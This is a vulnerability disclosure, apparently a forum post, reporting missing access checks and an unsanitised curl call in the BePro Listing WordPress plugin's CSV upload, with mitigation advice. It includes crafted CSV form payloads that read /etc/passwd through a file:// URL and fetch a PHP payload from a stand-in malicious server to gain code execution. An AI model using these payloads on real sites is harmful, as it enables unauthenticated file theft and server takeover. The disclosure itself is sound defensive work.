Potential Security Related Issue

As discussed in our email communications, I am posting my findings pertaining to a potential security vulnerability within this plugin.

Please note, I have included several images which I am not able to import into this post. I have included a link to the document where I have recorded my work- https://drive.google.com/file/d/1M7SSE3C_38p60j8DYyI8bxETG3BUYj30/view?usp=sharing

Access Control Issues and Unsafe
Usage of Curl

While reviewing the BePro Listing WordPress plugin, I was able to identify several issues which
could have a critical impact on the WordPress server the plugin is installed on. This issue
appears to stem from poor access control rules that allow unauthenticated users to change the
BePro Listing options. While the ability for an unauthenticated user to change the plugin options
is problematic, it is not a critical vulnerability. The critical vulnerability exists in how the plugin
handles the CSV file uploads. The CSV upload mechanism allows the user to upload images of
listings, by leveraging the “curl” command. However, the system leverages this function in an
unsafe manner. This allows unauthenticated users the ability to read local files, as well as
upload malicious files.

Access Control Issues

When an administrator attempts to update the BePro Listing options, a POST request is sent to
the following URL, “edit.php?post_type=bepro_listings&page=bepro_listings_options.”
Unfortunately, the processing of the POST request data does not appear to consider the current
user’s access levels.
This was verified by removing all cookies from the POST request sent when an admin updated
the options. Normally, the system will receive the packet, and leveraging the cookie data, verify
the current user.
Unfortunately, when replaying this request with no cookies, a request that should not be
processed, the plugin did process the request.
This issue appears tied to how the BePro Listing plugin initiates itself when called. When
constructed, the plugin adds an “init” action which calls “bepro_create_post_type().” Eventually,
this function will call the “permalink_save_options()” which edits the plugins options. None of
these functions perform any checks to verify that the current session has the acceptable
permissions.

Unsafe curl Usage
When an administrative user attempts to change the plugin’s options, a POST request
containing multipart form data is sent. The contents of this form data are reviewed and
processed by various files and functions within the plugin.
However, when processing CSV file uploads, which appear as below. The system does not
handle the “photo” field in a safe manner.
Content-Disposition: form-data; name=”csv_upload”; filename=”csv_upload_example.csv”
Content-Type: text/csv
item_name,content,categories,first_name,last_name,cost,email,website,address_line1,postcode,city,state
,country,phone,lat,lon,photo
Test listing, just a simple test, 1, john, tester, 500, [email protected], test_site, 220 e
university blvd, 32901, melbourne, fl, usa, 5554443333,,,http://example.com
When processing the uploaded CSV file, the bepro_listings_admin.php file will call the function
“permalink_save_options().” Within this function, the system will parse the various options
provided. When it encounters the CSV data, it will loop through the file to save various pieces of
information. However, when it comes to the “photo” field, the below code is executed.

As long as a URL is present, the system will call the function “bl_attach_remote_file()” which is
found in “bepro_listings_functions.php.”

Assuming a photo is present, the system processes the input and calls the function
“bl_http_get_file()” shown below. This function is where the vulnerability lies.

To download the file, the curl command is leveraged in most cases, as the “map_query_type” is
set to curl by default. When the curl function executes it will attempt to download the requested
file present at the “remote_url” variable. However, the remote_url variable is never sanitized.
This means that a user can leverage an arbitrary protocol and access arbitrary data on the
system. Currently, most versions of curl support the following protocols – dict, file, ftp, ftps,
gopher, http, https, imap, imaps, ldap, ldaps, pop3, pop3s, rtmp, rtsp, smb, smbs, smtp, smtps,
telnet, tftp.
Leveraging a protocol such as “file”, for example, could allow an arbitrary user to access local
files on the system. To do this, a user would only need to change the CSV POST data to the
following.
Content-Disposition: form-data; name=”csv_upload”; filename=”csv_upload_example.csv”
Content-Type: text/csv
item_name,content,categories,first_name,last_name,cost,email,website,address_line1,postcode,city,state
,country,phone,lat,lon,photo
Test listing, just a simple test, 1, john, tester, 500, [email protected], test_site, 220 e
university blvd, 32901, melbourne, fl, usa, 5554443333,,,file:///etc/passwd
Upon execution, this would place the contents of the passwd file within the uploads directory
with a file name of passwd. A malicious user could then leverage this data to support various
attacks.
Additionally, more serious attacks can occur. It is possible for a threat actor to upload an
arbitrary PHP file onto the server using various methods.
To achieve this a threat actor would only need to configure an HTTP server to return all files as
text content. From there they could create a malicious file with the PHP extension. When the
server requested this file, it would receive back the contents of the file in a text format, but
process it as a PHP file on its own system. A threat actor could use this to execute arbitrary
code on the server. The below payload, with the properly configured server, could achieve such
an attack. (In this example, the payload.php file would contain the attacker’s malicious code.)
Content-Disposition: form-data; name=”csv_upload”; filename=”csv_upload_example.csv”
Content-Type: text/csv
item_name,content,categories,first_name,last_name,cost,email,website,address_line1,postcode,city,state
,country,phone,lat,lon,photo
Test listing, just a simple test, 1, john, tester, 500, [email protected], test_site, 220 e
university blvd, 32901, melbourne, fl, usa, 5554443333,,,http://malicious.server/payload.php
Threat actors could likely execute similar attacks by abusing the FTP protocol.

To mitigate this issue, several steps should occur. First, the remote_url variable should be
sanitized. This sanitization process would include denying any non-HTTP urls. Given the use
case, I do not believe users will require any protocol outside of HTTP and HTTPS. Support for
additional protocols could create potential security issues.
Additionally, prior to storing any user supplied files on the server, the system should verify that
they are in fact image files. This verification should look at both the file name, and file content.
WordPress provides multiple functions to help with safe file uploads. However, I am not sure
how these would interface with the curl command.